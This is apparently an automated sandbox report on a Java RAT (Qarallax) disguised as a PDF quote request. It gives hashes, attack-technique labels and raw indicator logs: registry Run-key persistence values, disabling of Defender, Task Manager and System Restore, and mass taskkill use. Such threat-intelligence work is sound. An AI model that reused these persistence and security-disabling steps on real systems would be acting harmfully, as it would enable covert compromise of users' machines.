qarallax | 375701c84c2f332cdf71661d126066344087b88f26e0b3b1e8f761c7fdeacacd

Analysis

max time kernel
149s
max time network
92s
platform
windows7_x64
resource
win7v200722
submitted
26-08-2020 09:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Atlas Home Products Inc RFQ_pdf.jar
Size

411KB
MD5

f1a78d7990291195a2a680f972ee7738
SHA1

f5f7cb70a383b7afa313f3c96f7b8153ad4afab9
SHA256

375701c84c2f332cdf71661d126066344087b88f26e0b3b1e8f761c7fdeacacd
SHA512

08b0b7167bb2b4068eaf43bcdf3b75e2991429ccd90344d401f41a3669b66c9f74911c1969a7004b41e1ffe29d2481c7652cb3485e17a2eff052e7437d4ec2df

Score

10^/10

trojan qarallax evasion persistence

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x0003000000013536-7.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1436	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\RHnsy	java.exe
File created	C:\Windows\System32\RHnsy	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
2104	taskkill.exe
2144	taskkill.exe
1388	taskkill.exe
2912	taskkill.exe
1368	taskkill.exe
1732	taskkill.exe
2084	taskkill.exe
1788	taskkill.exe
2088	taskkill.exe
1976	taskkill.exe
476	taskkill.exe
1744	taskkill.exe
2940	taskkill.exe
1484	taskkill.exe
1944	taskkill.exe
2416	taskkill.exe
2728	taskkill.exe
2336	taskkill.exe
1828	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1540	powershell.exe
1540	powershell.exe

Suspicious use of AdjustPrivilegeToken 140 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe
Token: 33	1516	WMIC.exe
Token: 34	1516	WMIC.exe
Token: 35	1516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe
Token: 33	1516	WMIC.exe
Token: 34	1516	WMIC.exe
Token: 35	1516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1748	WMIC.exe
Token: SeSecurityPrivilege	1748	WMIC.exe
Token: SeTakeOwnershipPrivilege	1748	WMIC.exe
Token: SeLoadDriverPrivilege	1748	WMIC.exe
Token: SeSystemProfilePrivilege	1748	WMIC.exe
Token: SeSystemtimePrivilege	1748	WMIC.exe
Token: SeProfSingleProcessPrivilege	1748	WMIC.exe
Token: SeIncBasePriorityPrivilege	1748	WMIC.exe
Token: SeCreatePagefilePrivilege	1748	WMIC.exe
Token: SeBackupPrivilege	1748	WMIC.exe
Token: SeRestorePrivilege	1748	WMIC.exe
Token: SeShutdownPrivilege	1748	WMIC.exe
Token: SeDebugPrivilege	1748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1748	WMIC.exe
Token: SeRemoteShutdownPrivilege	1748	WMIC.exe
Token: SeUndockPrivilege	1748	WMIC.exe
Token: SeManageVolumePrivilege	1748	WMIC.exe
Token: 33	1748	WMIC.exe
Token: 34	1748	WMIC.exe
Token: 35	1748	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1748	WMIC.exe
Token: SeSecurityPrivilege	1748	WMIC.exe
Token: SeTakeOwnershipPrivilege	1748	WMIC.exe
Token: SeLoadDriverPrivilege	1748	WMIC.exe
Token: SeSystemProfilePrivilege	1748	WMIC.exe
Token: SeSystemtimePrivilege	1748	WMIC.exe
Token: SeProfSingleProcessPrivilege	1748	WMIC.exe
Token: SeIncBasePriorityPrivilege	1748	WMIC.exe
Token: SeCreatePagefilePrivilege	1748	WMIC.exe
Token: SeBackupPrivilege	1748	WMIC.exe
Token: SeRestorePrivilege	1748	WMIC.exe
Token: SeShutdownPrivilege	1748	WMIC.exe
Token: SeDebugPrivilege	1748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1748	WMIC.exe
Token: SeRemoteShutdownPrivilege	1748	WMIC.exe
Token: SeUndockPrivilege	1748	WMIC.exe
Token: SeManageVolumePrivilege	1748	WMIC.exe
Token: 33	1748	WMIC.exe
Token: 34	1748	WMIC.exe
Token: 35	1748	WMIC.exe
Token: SeDebugPrivilege	476	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeSecurityPrivilege	2368	WMIC.exe
Token: SeTakeOwnershipPrivilege	2368	WMIC.exe
Token: SeLoadDriverPrivilege	2368	WMIC.exe
Token: SeSystemProfilePrivilege	2368	WMIC.exe
Token: SeSystemtimePrivilege	2368	WMIC.exe
Token: SeProfSingleProcessPrivilege	2368	WMIC.exe
Token: SeIncBasePriorityPrivilege	2368	WMIC.exe
Token: SeCreatePagefilePrivilege	2368	WMIC.exe
Token: SeBackupPrivilege	2368	WMIC.exe
Token: SeRestorePrivilege	2368	WMIC.exe
Token: SeShutdownPrivilege	2368	WMIC.exe
Token: SeDebugPrivilege	2368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2368	WMIC.exe
Token: SeRemoteShutdownPrivilege	2368	WMIC.exe
Token: SeUndockPrivilege	2368	WMIC.exe
Token: SeManageVolumePrivilege	2368	WMIC.exe
Token: 33	2368	WMIC.exe
Token: 34	2368	WMIC.exe
Token: 35	2368	WMIC.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeSecurityPrivilege	2368	WMIC.exe
Token: SeTakeOwnershipPrivilege	2368	WMIC.exe
Token: SeLoadDriverPrivilege	2368	WMIC.exe
Token: SeSystemProfilePrivilege	2368	WMIC.exe
Token: SeSystemtimePrivilege	2368	WMIC.exe
Token: SeProfSingleProcessPrivilege	2368	WMIC.exe
Token: SeIncBasePriorityPrivilege	2368	WMIC.exe
Token: SeCreatePagefilePrivilege	2368	WMIC.exe
Token: SeBackupPrivilege	2368	WMIC.exe
Token: SeRestorePrivilege	2368	WMIC.exe
Token: SeShutdownPrivilege	2368	WMIC.exe
Token: SeDebugPrivilege	2368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2368	WMIC.exe
Token: SeRemoteShutdownPrivilege	2368	WMIC.exe
Token: SeUndockPrivilege	2368	WMIC.exe
Token: SeManageVolumePrivilege	2368	WMIC.exe
Token: 33	2368	WMIC.exe
Token: 34	2368	WMIC.exe
Token: 35	2368	WMIC.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	2084	taskkill.exe
Token: SeDebugPrivilege	2940	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1436	java.exe

Suspicious use of WriteProcessMemory 804 IoCs

description	pid	Process	procid_target
PID 1436 wrote to memory of 1040	1436	java.exe	25
PID 1436 wrote to memory of 1040	1436	java.exe	25
PID 1436 wrote to memory of 1040	1436	java.exe	25
PID 1436 wrote to memory of 1524	1436	java.exe	26
PID 1436 wrote to memory of 1524	1436	java.exe	26
PID 1436 wrote to memory of 1524	1436	java.exe	26
PID 1524 wrote to memory of 1516	1524	cmd.exe	27
PID 1524 wrote to memory of 1516	1524	cmd.exe	27
PID 1524 wrote to memory of 1516	1524	cmd.exe	27
PID 1436 wrote to memory of 1752	1436	java.exe	28
PID 1436 wrote to memory of 1752	1436	java.exe	28
PID 1436 wrote to memory of 1752	1436	java.exe	28
PID 1752 wrote to memory of 1748	1752	cmd.exe	29
PID 1752 wrote to memory of 1748	1752	cmd.exe	29
PID 1752 wrote to memory of 1748	1752	cmd.exe	29
PID 1436 wrote to memory of 1816	1436	java.exe	30
PID 1436 wrote to memory of 1816	1436	java.exe	30
PID 1436 wrote to memory of 1816	1436	java.exe	30
PID 1436 wrote to memory of 1792	1436	java.exe	31
PID 1436 wrote to memory of 1792	1436	java.exe	31
PID 1436 wrote to memory of 1792	1436	java.exe	31
PID 1436 wrote to memory of 572	1436	java.exe	32
PID 1436 wrote to memory of 572	1436	java.exe	32
PID 1436 wrote to memory of 572	1436	java.exe	32
PID 1436 wrote to memory of 1356	1436	java.exe	33
PID 1436 wrote to memory of 1356	1436	java.exe	33
PID 1436 wrote to memory of 1356	1436	java.exe	33
PID 1436 wrote to memory of 1348	1436	java.exe	34
PID 1436 wrote to memory of 1348	1436	java.exe	34
PID 1436 wrote to memory of 1348	1436	java.exe	34
PID 1436 wrote to memory of 612	1436	java.exe	35
PID 1436 wrote to memory of 612	1436	java.exe	35
PID 1436 wrote to memory of 612	1436	java.exe	35
PID 1436 wrote to memory of 300	1436	java.exe	36
PID 1436 wrote to memory of 300	1436	java.exe	36
PID 1436 wrote to memory of 300	1436	java.exe	36
PID 1436 wrote to memory of 1632	1436	java.exe	37
PID 1436 wrote to memory of 1632	1436	java.exe	37
PID 1436 wrote to memory of 1632	1436	java.exe	37
PID 1436 wrote to memory of 1724	1436	java.exe	38
PID 1436 wrote to memory of 1724	1436	java.exe	38
PID 1436 wrote to memory of 1724	1436	java.exe	38
PID 1436 wrote to memory of 1540	1436	java.exe	39
PID 1436 wrote to memory of 1540	1436	java.exe	39
PID 1436 wrote to memory of 1540	1436	java.exe	39
PID 1436 wrote to memory of 1572	1436	java.exe	40
PID 1436 wrote to memory of 1572	1436	java.exe	40
PID 1436 wrote to memory of 1572	1436	java.exe	40
PID 1436 wrote to memory of 1944	1436	java.exe	41
PID 1436 wrote to memory of 1944	1436	java.exe	41
PID 1436 wrote to memory of 1944	1436	java.exe	41
PID 1724 wrote to memory of 1916	1724	cmd.exe	43
PID 1724 wrote to memory of 1916	1724	cmd.exe	43
PID 1724 wrote to memory of 1916	1724	cmd.exe	43
PID 1436 wrote to memory of 1976	1436	java.exe	44
PID 1436 wrote to memory of 1976	1436	java.exe	44
PID 1436 wrote to memory of 1976	1436	java.exe	44
PID 1436 wrote to memory of 1988	1436	java.exe	45
PID 1436 wrote to memory of 1988	1436	java.exe	45
PID 1436 wrote to memory of 1988	1436	java.exe	45
PID 1436 wrote to memory of 1996	1436	java.exe	46
PID 1436 wrote to memory of 1996	1436	java.exe	46
PID 1436 wrote to memory of 1996	1436	java.exe	46
PID 1436 wrote to memory of 1972	1436	java.exe	47
PID 1436 wrote to memory of 1972	1436	java.exe	47
PID 1436 wrote to memory of 1972	1436	java.exe	47
PID 1436 wrote to memory of 1052	1436	java.exe	48
PID 1436 wrote to memory of 1052	1436	java.exe	48
PID 1436 wrote to memory of 1052	1436	java.exe	48
PID 1436 wrote to memory of 1292	1436	java.exe	49
PID 1436 wrote to memory of 1292	1436	java.exe	49
PID 1436 wrote to memory of 1292	1436	java.exe	49
PID 1436 wrote to memory of 816	1436	java.exe	51
PID 1436 wrote to memory of 816	1436	java.exe	51
PID 1436 wrote to memory of 816	1436	java.exe	51
PID 1436 wrote to memory of 1508	1436	java.exe	52
PID 1436 wrote to memory of 1508	1436	java.exe	52
PID 1436 wrote to memory of 1508	1436	java.exe	52
PID 1436 wrote to memory of 1272	1436	java.exe	60
PID 1436 wrote to memory of 1272	1436	java.exe	60
PID 1436 wrote to memory of 1272	1436	java.exe	60
PID 1436 wrote to memory of 1460	1436	java.exe	62
PID 1436 wrote to memory of 1460	1436	java.exe	62
PID 1436 wrote to memory of 1460	1436	java.exe	62
PID 1436 wrote to memory of 956	1436	java.exe	65
PID 1436 wrote to memory of 956	1436	java.exe	65
PID 1436 wrote to memory of 956	1436	java.exe	65
PID 1436 wrote to memory of 828	1436	java.exe	66
PID 1436 wrote to memory of 828	1436	java.exe	66
PID 1436 wrote to memory of 828	1436	java.exe	66
PID 1724 wrote to memory of 1608	1724	cmd.exe	67
PID 1724 wrote to memory of 1608	1724	cmd.exe	67
PID 1724 wrote to memory of 1608	1724	cmd.exe	67
PID 1436 wrote to memory of 476	1436	java.exe	71
PID 1436 wrote to memory of 476	1436	java.exe	71
PID 1436 wrote to memory of 476	1436	java.exe	71
PID 1436 wrote to memory of 1056	1436	java.exe	72
PID 1436 wrote to memory of 1056	1436	java.exe	72
PID 1436 wrote to memory of 1056	1436	java.exe	72
PID 1436 wrote to memory of 1084	1436	java.exe	73
PID 1436 wrote to memory of 1084	1436	java.exe	73
PID 1436 wrote to memory of 1084	1436	java.exe	73
PID 1436 wrote to memory of 604	1436	java.exe	75
PID 1436 wrote to memory of 604	1436	java.exe	75
PID 1436 wrote to memory of 604	1436	java.exe	75
PID 1436 wrote to memory of 564	1436	java.exe	78
PID 1436 wrote to memory of 564	1436	java.exe	78
PID 1436 wrote to memory of 564	1436	java.exe	78
PID 1436 wrote to memory of 1400	1436	java.exe	80
PID 1436 wrote to memory of 1400	1436	java.exe	80
PID 1436 wrote to memory of 1400	1436	java.exe	80
PID 1436 wrote to memory of 268	1436	java.exe	81
PID 1436 wrote to memory of 268	1436	java.exe	81
PID 1436 wrote to memory of 268	1436	java.exe	81
PID 1436 wrote to memory of 1948	1436	java.exe	83
PID 1436 wrote to memory of 1948	1436	java.exe	83
PID 1436 wrote to memory of 1948	1436	java.exe	83
PID 1436 wrote to memory of 1988	1436	java.exe	85
PID 1436 wrote to memory of 1988	1436	java.exe	85
PID 1436 wrote to memory of 1988	1436	java.exe	85
PID 1436 wrote to memory of 816	1436	java.exe	86
PID 1436 wrote to memory of 816	1436	java.exe	86
PID 1436 wrote to memory of 816	1436	java.exe	86
PID 1436 wrote to memory of 1816	1436	java.exe	88
PID 1436 wrote to memory of 1816	1436	java.exe	88
PID 1436 wrote to memory of 1816	1436	java.exe	88
PID 1948 wrote to memory of 612	1948	cmd.exe	89
PID 1948 wrote to memory of 612	1948	cmd.exe	89
PID 1948 wrote to memory of 612	1948	cmd.exe	89
PID 1436 wrote to memory of 1524	1436	java.exe	92
PID 1436 wrote to memory of 1524	1436	java.exe	92
PID 1436 wrote to memory of 1524	1436	java.exe	92
PID 1436 wrote to memory of 1512	1436	java.exe	94
PID 1436 wrote to memory of 1512	1436	java.exe	94
PID 1436 wrote to memory of 1512	1436	java.exe	94
PID 1436 wrote to memory of 1744	1436	java.exe	95
PID 1436 wrote to memory of 1744	1436	java.exe	95
PID 1436 wrote to memory of 1744	1436	java.exe	95
PID 1436 wrote to memory of 1980	1436	java.exe	96
PID 1436 wrote to memory of 1980	1436	java.exe	96
PID 1436 wrote to memory of 1980	1436	java.exe	96
PID 1436 wrote to memory of 1520	1436	java.exe	97
PID 1436 wrote to memory of 1520	1436	java.exe	97
PID 1436 wrote to memory of 1520	1436	java.exe	97
PID 1436 wrote to memory of 1868	1436	java.exe	99
PID 1436 wrote to memory of 1868	1436	java.exe	99
PID 1436 wrote to memory of 1868	1436	java.exe	99
PID 1436 wrote to memory of 708	1436	java.exe	102
PID 1436 wrote to memory of 708	1436	java.exe	102
PID 1436 wrote to memory of 708	1436	java.exe	102
PID 1436 wrote to memory of 1020	1436	java.exe	103
PID 1436 wrote to memory of 1020	1436	java.exe	103
PID 1436 wrote to memory of 1020	1436	java.exe	103
PID 1436 wrote to memory of 1444	1436	java.exe	106
PID 1436 wrote to memory of 1444	1436	java.exe	106
PID 1436 wrote to memory of 1444	1436	java.exe	106
PID 1436 wrote to memory of 1412	1436	java.exe	108
PID 1436 wrote to memory of 1412	1436	java.exe	108
PID 1436 wrote to memory of 1412	1436	java.exe	108
PID 1436 wrote to memory of 760	1436	java.exe	110
PID 1436 wrote to memory of 760	1436	java.exe	110
PID 1436 wrote to memory of 760	1436	java.exe	110
PID 1436 wrote to memory of 1944	1436	java.exe	112
PID 1436 wrote to memory of 1944	1436	java.exe	112
PID 1436 wrote to memory of 1944	1436	java.exe	112
PID 1948 wrote to memory of 2072	1948	cmd.exe	117
PID 1948 wrote to memory of 2072	1948	cmd.exe	117
PID 1948 wrote to memory of 2072	1948	cmd.exe	117
PID 1436 wrote to memory of 2092	1436	java.exe	118
PID 1436 wrote to memory of 2092	1436	java.exe	118
PID 1436 wrote to memory of 2092	1436	java.exe	118
PID 1436 wrote to memory of 2104	1436	java.exe	119
PID 1436 wrote to memory of 2104	1436	java.exe	119
PID 1436 wrote to memory of 2104	1436	java.exe	119
PID 2092 wrote to memory of 2156	2092	cmd.exe	121
PID 2092 wrote to memory of 2156	2092	cmd.exe	121
PID 2092 wrote to memory of 2156	2092	cmd.exe	121
PID 2092 wrote to memory of 2172	2092	cmd.exe	122
PID 2092 wrote to memory of 2172	2092	cmd.exe	122
PID 2092 wrote to memory of 2172	2092	cmd.exe	122
PID 1436 wrote to memory of 2192	1436	java.exe	123
PID 1436 wrote to memory of 2192	1436	java.exe	123
PID 1436 wrote to memory of 2192	1436	java.exe	123
PID 2192 wrote to memory of 2208	2192	cmd.exe	124
PID 2192 wrote to memory of 2208	2192	cmd.exe	124
PID 2192 wrote to memory of 2208	2192	cmd.exe	124
PID 2192 wrote to memory of 2220	2192	cmd.exe	125
PID 2192 wrote to memory of 2220	2192	cmd.exe	125
PID 2192 wrote to memory of 2220	2192	cmd.exe	125
PID 1436 wrote to memory of 2260	1436	java.exe	127
PID 1436 wrote to memory of 2260	1436	java.exe	127
PID 1436 wrote to memory of 2260	1436	java.exe	127
PID 2260 wrote to memory of 2284	2260	cmd.exe	128
PID 2260 wrote to memory of 2284	2260	cmd.exe	128
PID 2260 wrote to memory of 2284	2260	cmd.exe	128
PID 1436 wrote to memory of 2316	1436	java.exe	130
PID 1436 wrote to memory of 2316	1436	java.exe	130
PID 1436 wrote to memory of 2316	1436	java.exe	130
PID 2260 wrote to memory of 2332	2260	cmd.exe	131
PID 2260 wrote to memory of 2332	2260	cmd.exe	131
PID 2260 wrote to memory of 2332	2260	cmd.exe	131
PID 1436 wrote to memory of 2352	1436	java.exe	132
PID 1436 wrote to memory of 2352	1436	java.exe	132
PID 1436 wrote to memory of 2352	1436	java.exe	132
PID 2316 wrote to memory of 2368	2316	cmd.exe	133
PID 2316 wrote to memory of 2368	2316	cmd.exe	133
PID 2316 wrote to memory of 2368	2316	cmd.exe	133
PID 2352 wrote to memory of 2388	2352	cmd.exe	134
PID 2352 wrote to memory of 2388	2352	cmd.exe	134
PID 2352 wrote to memory of 2388	2352	cmd.exe	134
PID 1436 wrote to memory of 2416	1436	java.exe	135
PID 1436 wrote to memory of 2416	1436	java.exe	135
PID 1436 wrote to memory of 2416	1436	java.exe	135
PID 2352 wrote to memory of 2436	2352	cmd.exe	136
PID 2352 wrote to memory of 2436	2352	cmd.exe	136
PID 2352 wrote to memory of 2436	2352	cmd.exe	136
PID 1436 wrote to memory of 2468	1436	java.exe	138
PID 1436 wrote to memory of 2468	1436	java.exe	138
PID 1436 wrote to memory of 2468	1436	java.exe	138
PID 2468 wrote to memory of 2484	2468	cmd.exe	139
PID 2468 wrote to memory of 2484	2468	cmd.exe	139
PID 2468 wrote to memory of 2484	2468	cmd.exe	139
PID 2468 wrote to memory of 2500	2468	cmd.exe	140
PID 2468 wrote to memory of 2500	2468	cmd.exe	140
PID 2468 wrote to memory of 2500	2468	cmd.exe	140
PID 1436 wrote to memory of 2512	1436	java.exe	141
PID 1436 wrote to memory of 2512	1436	java.exe	141
PID 1436 wrote to memory of 2512	1436	java.exe	141
PID 2512 wrote to memory of 2524	2512	cmd.exe	142
PID 2512 wrote to memory of 2524	2512	cmd.exe	142
PID 2512 wrote to memory of 2524	2512	cmd.exe	142
PID 2512 wrote to memory of 2536	2512	cmd.exe	143
PID 2512 wrote to memory of 2536	2512	cmd.exe	143
PID 2512 wrote to memory of 2536	2512	cmd.exe	143
PID 1436 wrote to memory of 2548	1436	java.exe	144
PID 1436 wrote to memory of 2548	1436	java.exe	144
PID 1436 wrote to memory of 2548	1436	java.exe	144
PID 2548 wrote to memory of 2568	2548	cmd.exe	145
PID 2548 wrote to memory of 2568	2548	cmd.exe	145
PID 2548 wrote to memory of 2568	2548	cmd.exe	145
PID 2548 wrote to memory of 2640	2548	cmd.exe	147
PID 2548 wrote to memory of 2640	2548	cmd.exe	147
PID 2548 wrote to memory of 2640	2548	cmd.exe	147
PID 1436 wrote to memory of 2656	1436	java.exe	148
PID 1436 wrote to memory of 2656	1436	java.exe	148
PID 1436 wrote to memory of 2656	1436	java.exe	148
PID 2656 wrote to memory of 2668	2656	cmd.exe	149
PID 2656 wrote to memory of 2668	2656	cmd.exe	149
PID 2656 wrote to memory of 2668	2656	cmd.exe	149
PID 2656 wrote to memory of 2708	2656	cmd.exe	150
PID 2656 wrote to memory of 2708	2656	cmd.exe	150
PID 2656 wrote to memory of 2708	2656	cmd.exe	150
PID 1436 wrote to memory of 2728	1436	java.exe	151
PID 1436 wrote to memory of 2728	1436	java.exe	151
PID 1436 wrote to memory of 2728	1436	java.exe	151
PID 1436 wrote to memory of 2772	1436	java.exe	153
PID 1436 wrote to memory of 2772	1436	java.exe	153
PID 1436 wrote to memory of 2772	1436	java.exe	153
PID 2772 wrote to memory of 2784	2772	cmd.exe	154
PID 2772 wrote to memory of 2784	2772	cmd.exe	154
PID 2772 wrote to memory of 2784	2772	cmd.exe	154
PID 2772 wrote to memory of 2820	2772	cmd.exe	155
PID 2772 wrote to memory of 2820	2772	cmd.exe	155
PID 2772 wrote to memory of 2820	2772	cmd.exe	155
PID 1436 wrote to memory of 2840	1436	java.exe	156
PID 1436 wrote to memory of 2840	1436	java.exe	156
PID 1436 wrote to memory of 2840	1436	java.exe	156
PID 2840 wrote to memory of 2852	2840	cmd.exe	157
PID 2840 wrote to memory of 2852	2840	cmd.exe	157
PID 2840 wrote to memory of 2852	2840	cmd.exe	157
PID 2840 wrote to memory of 2864	2840	cmd.exe	158
PID 2840 wrote to memory of 2864	2840	cmd.exe	158
PID 2840 wrote to memory of 2864	2840	cmd.exe	158
PID 1436 wrote to memory of 2880	1436	java.exe	159
PID 1436 wrote to memory of 2880	1436	java.exe	159
PID 1436 wrote to memory of 2880	1436	java.exe	159
PID 2880 wrote to memory of 2892	2880	cmd.exe	160
PID 2880 wrote to memory of 2892	2880	cmd.exe	160
PID 2880 wrote to memory of 2892	2880	cmd.exe	160
PID 1436 wrote to memory of 2912	1436	java.exe	161
PID 1436 wrote to memory of 2912	1436	java.exe	161
PID 1436 wrote to memory of 2912	1436	java.exe	161
PID 2880 wrote to memory of 2936	2880	cmd.exe	163
PID 2880 wrote to memory of 2936	2880	cmd.exe	163
PID 2880 wrote to memory of 2936	2880	cmd.exe	163
PID 1436 wrote to memory of 2952	1436	java.exe	164
PID 1436 wrote to memory of 2952	1436	java.exe	164
PID 1436 wrote to memory of 2952	1436	java.exe	164
PID 2952 wrote to memory of 2968	2952	cmd.exe	165
PID 2952 wrote to memory of 2968	2952	cmd.exe	165
PID 2952 wrote to memory of 2968	2952	cmd.exe	165
PID 2952 wrote to memory of 2988	2952	cmd.exe	166
PID 2952 wrote to memory of 2988	2952	cmd.exe	166
PID 2952 wrote to memory of 2988	2952	cmd.exe	166
PID 1436 wrote to memory of 3008	1436	java.exe	167
PID 1436 wrote to memory of 3008	1436	java.exe	167
PID 1436 wrote to memory of 3008	1436	java.exe	167
PID 3008 wrote to memory of 3024	3008	cmd.exe	168
PID 3008 wrote to memory of 3024	3008	cmd.exe	168
PID 3008 wrote to memory of 3024	3008	cmd.exe	168
PID 3008 wrote to memory of 3048	3008	cmd.exe	169
PID 3008 wrote to memory of 3048	3008	cmd.exe	169
PID 3008 wrote to memory of 3048	3008	cmd.exe	169
PID 1436 wrote to memory of 3064	1436	java.exe	170
PID 1436 wrote to memory of 3064	1436	java.exe	170
PID 1436 wrote to memory of 3064	1436	java.exe	170
PID 3064 wrote to memory of 2056	3064	cmd.exe	171
PID 3064 wrote to memory of 2056	3064	cmd.exe	171
PID 3064 wrote to memory of 2056	3064	cmd.exe	171
PID 3064 wrote to memory of 564	3064	cmd.exe	172
PID 3064 wrote to memory of 564	3064	cmd.exe	172
PID 3064 wrote to memory of 564	3064	cmd.exe	172
PID 1436 wrote to memory of 1064	1436	java.exe	173
PID 1436 wrote to memory of 1064	1436	java.exe	173
PID 1436 wrote to memory of 1064	1436	java.exe	173
PID 1064 wrote to memory of 1268	1064	cmd.exe	174
PID 1064 wrote to memory of 1268	1064	cmd.exe	174
PID 1064 wrote to memory of 1268	1064	cmd.exe	174
PID 1064 wrote to memory of 1788	1064	cmd.exe	175
PID 1064 wrote to memory of 1788	1064	cmd.exe	175
PID 1064 wrote to memory of 1788	1064	cmd.exe	175
PID 1436 wrote to memory of 1368	1436	java.exe	176
PID 1436 wrote to memory of 1368	1436	java.exe	176
PID 1436 wrote to memory of 1368	1436	java.exe	176
PID 1436 wrote to memory of 1900	1436	java.exe	178
PID 1436 wrote to memory of 1900	1436	java.exe	178
PID 1436 wrote to memory of 1900	1436	java.exe	178
PID 1900 wrote to memory of 1868	1900	cmd.exe	179
PID 1900 wrote to memory of 1868	1900	cmd.exe	179
PID 1900 wrote to memory of 1868	1900	cmd.exe	179
PID 1900 wrote to memory of 1040	1900	cmd.exe	180
PID 1900 wrote to memory of 1040	1900	cmd.exe	180
PID 1900 wrote to memory of 1040	1900	cmd.exe	180
PID 1436 wrote to memory of 1984	1436	java.exe	181
PID 1436 wrote to memory of 1984	1436	java.exe	181
PID 1436 wrote to memory of 1984	1436	java.exe	181
PID 1984 wrote to memory of 1792	1984	cmd.exe	182
PID 1984 wrote to memory of 1792	1984	cmd.exe	182
PID 1984 wrote to memory of 1792	1984	cmd.exe	182
PID 1984 wrote to memory of 1804	1984	cmd.exe	183
PID 1984 wrote to memory of 1804	1984	cmd.exe	183
PID 1984 wrote to memory of 1804	1984	cmd.exe	183
PID 1436 wrote to memory of 1240	1436	java.exe	184
